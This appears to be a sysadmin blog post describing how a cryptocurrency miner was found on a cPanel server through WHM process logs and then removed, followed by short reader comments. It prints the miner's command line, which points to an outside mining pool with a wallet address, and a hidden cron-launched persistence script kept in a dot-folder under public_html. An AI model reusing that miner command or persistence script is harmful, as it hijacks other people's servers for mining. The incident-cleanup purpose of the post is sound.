Recently one of server under my control infected with mining software. It cause unnecessary load and waste of server resource.
Since the server is using Cpanel, I must use WHM to track down the source. I check WHM ‘Process Manager’ and ‘Daily process log’ and found something similar like :
impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x
Using ‘Process Manager’ to kill the pid who is running the process.
I have check in the user Cpanel and found strange cronjob point to strange path eg :
/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
So I read the content of the file using cat command:
[[email protected] ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null
Go to the folder contents and see what is inside the folder:
[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[[email protected] .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x
The existence of bash.pid confirm that the mining come from that path.
Delete the folder and delete the cronjob so the mining stop.
[[email protected] .qts]# cd ..
[[email protected] includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’
Its such as you read my mind! You appear to understand so much about this, like you wrote
the guide in it or something. I feel that you simply could do with a few
% to drive the message house a little bit, however instead of
that, that is magnificent blog. A fantastic read.
I will certainly be back.
Do you have any idea of how they infected the server in the first place? how did they upload the bash.pid file onto the server?
Outdated script…